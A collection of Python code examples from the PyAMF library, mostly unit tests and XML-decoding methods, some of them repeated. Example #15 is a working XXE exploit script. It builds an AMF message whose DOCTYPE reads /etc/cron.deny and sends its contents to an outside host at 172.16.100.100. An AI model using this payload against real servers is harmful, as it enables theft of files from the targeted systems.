Пример #1
0
    def test_xml_references(self):
        self.buf.truncate(0)
        self.buf.write("\x0f\x00\x00\x00\x19<a><b>hello world</b></a>" "\x07\x00\x00")
        self.buf.seek(0)

        self.assertEqual(
            xml.tostring(xml.fromstring("<a><b>hello world</b></a>")), xml.tostring(self.decoder.readElement())
        )

        self.assertEqual(
            xml.tostring(xml.fromstring("<a><b>hello world</b></a>")), xml.tostring(self.decoder.readElement())
        )
Пример #2
0
    def test_xml_references(self):
        self.buf.truncate(0)
        self.buf.write('\x0f\x00\x00\x00\x19<a><b>hello world</b></a>'
                       '\x07\x00\x00')
        self.buf.seek(0)

        self.assertEqual(
            xml.tostring(xml.fromstring('<a><b>hello world</b></a>')),
            xml.tostring(self.decoder.readElement()))

        self.assertEqual(
            xml.tostring(xml.fromstring('<a><b>hello world</b></a>')),
            xml.tostring(self.decoder.readElement()))
Пример #3
0
    def test_amf3_xml(self):
        self.encoder.use_amf3 = True
        blob = '<root><sections><section /><section /></sections></root>'

        blob = xml.tostring(xml.fromstring(blob))

        bytes = self.encode(xml.fromstring(blob))

        buf = util.BufferedByteStream(bytes)

        self.assertEqual(buf.read_uchar(), 17)
        self.assertEqual(buf.read_uchar(), 11)
        self.assertEqual(buf.read_uchar() >> 1, buf.remaining())
        self.assertEqual(buf.read(), blob)
Пример #4
0
    def test_amf3_xml(self):
        self.encoder.use_amf3 = True
        blob = '<root><sections><section /><section /></sections></root>'

        blob = xml.tostring(xml.fromstring(blob))

        bytes = self.encode(xml.fromstring(blob))

        buf = util.BufferedByteStream(bytes)

        self.assertEqual(buf.read_uchar(), 17)
        self.assertEqual(buf.read_uchar(), 11)
        self.assertEqual(buf.read_uchar() >> 1, buf.remaining())
        self.assertEqual(buf.read(), blob)
Пример #5
0
    def test_xml(self):
        blob = '<a><b>hello world</b></a>'

        self.assertEncoded(
            xml.fromstring(blob),
            '\x0f\x00\x00\x00\x19' + blob
        )
Пример #6
0
    def test_xml(self):
        blob = b'<a><b>hello world</b></a>'

        self.assertEncoded(
            xml.fromstring(blob),
            b'\x0f\x00\x00\x00\x19' + blob
        )
Пример #7
0
    def test_xml_references(self):
        blob = '<a><b>hello world</b></a>'
        x = xml.fromstring(blob)

        self.assertEncoded(
            [x, x],
            '\n\x00\x00\x00\x02' + ('\x0f\x00\x00\x00\x19' + blob) * 2
        )
Пример #8
0
    def test_xml_references(self):
        blob = b'<a><b>hello world</b></a>'
        x = xml.fromstring(blob)

        self.assertEncoded(
            [x, x],
            b'\n\x00\x00\x00\x02' + (b'\x0f\x00\x00\x00\x19' + blob) * 2
        )
Пример #9
0
    def readXML(self):
        """
        Read XML.
        """
        data = self.readLongString()
        root = xml.fromstring(data)

        self.context.addObject(root)

        return root
Пример #10
0
    def readXML(self):
        """
        Read XML.
        """
        data = self.readLongString()
        root = xml.fromstring(data)

        self.context.addObject(root)

        return root
Пример #11
0
    def readXML(self):
        """
        Read XML.
        """
        data = self.readLongString()
        root = xml.fromstring(
            data,
            forbid_dtd=self.context.forbid_dtd,
            forbid_entities=self.context.forbid_entities,
        )

        self.context.addObject(root)

        return root
Пример #12
0
    def readXML(self):
        """
        Read XML.
        """
        data = self.readLongString()
        root = xml.fromstring(
            data,
            forbid_dtd=self.context.forbid_dtd,
            forbid_entities=self.context.forbid_entities,
        )

        self.context.addObject(root)

        return root
Пример #13
0
    def readXML(self):
        """
        Reads an xml object from the stream.

        @return: An etree interface compatible object
        @see: L{xml.set_default_interface}
        """
        ref = self.readInteger(False)

        if ref & REFERENCE_BIT == 0:
            return self.context.getObject(ref >> 1)

        xmlstring = self.stream.read(ref >> 1)

        x = xml.fromstring(xmlstring)
        self.context.addObject(x)

        return x
Пример #14
0
    def readXML(self):
        """
        Reads an xml object from the stream.

        @return: An etree interface compatible object
        @see: L{xml.set_default_interface}
        """
        ref = self.readInteger(False)

        if ref & REFERENCE_BIT == 0:
            return self.context.getObject(ref >> 1)

        xmlstring = self.stream.read(ref >> 1)

        x = xml.fromstring(xmlstring)
        self.context.addObject(x)

        return x
Пример #15
0
from pyamf import xml
import requests
requests.packages.urllib3.disable_warnings()

xxexml = '''<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/cron.deny">
<!ENTITY % remote SYSTEM "http://172.16.100.100/evil.xml">
%remote;
%all;
%send;
]>'''
evil_xml = '''<!ENTITY % all "<!ENTITY &#37; send SYSTEM 'http://172.16.100.100/report.php?file=%file;'>">'''

xmlp = '<a>' + 'x' * (len(xxexml) - 7) + '</a>'
xmlObj = xml.fromstring(xmlp)
amfReq = CommandMessage(operation=5,
                        destination=u'',
                        messageID=u'F9E40DCB-78E2-68AD-0BC9-A56F41399B88',
                        body=xmlObj,
                        clientId=None,
                        headers={
                            'DSID': u'nil',
                            'DSMessagingVersion': 1.0
                        })
envelope = pyamf.remoting.Envelope(amfVersion=3)
envelope["/%d" % 1] = pyamf.remoting.Request(u'null', [amfReq])
message = pyamf.remoting.encode(envelope)
msg = message.getvalue()
msg = msg.replace(xmlp, xxexml)
print 'payload: %r' % (msg)
Пример #16
0
 def test_xmlstring(self):
     x = xml.fromstring('<a><b>hello world</b></a>')
     self.assertEqual(self.encode(x), '\x0b\x33<a><b>hello world</b></a>')
     self.assertEqual(self.encode(x), '\x0b\x00')
Пример #17
0
    def test_xml_references(self):
        blob = "<a><b>hello world</b></a>"
        x = xml.fromstring(blob)

        self.assertEncoded([x, x], "\n\x00\x00\x00\x02" + ("\x0f\x00\x00\x00\x19" + blob) * 2)
Пример #18
0
 def test_xmlstring(self):
     x = xml.fromstring('<a><b>hello world</b></a>')
     self.assertEqual(self.encode(x), '\x0b\x33<a><b>hello world</b></a>')
     self.assertEqual(self.encode(x), '\x0b\x00')
Пример #19
0
    def test_xml(self):
        blob = "<a><b>hello world</b></a>"

        self.assertEncoded(xml.fromstring(blob), "\x0f\x00\x00\x00\x19" + blob)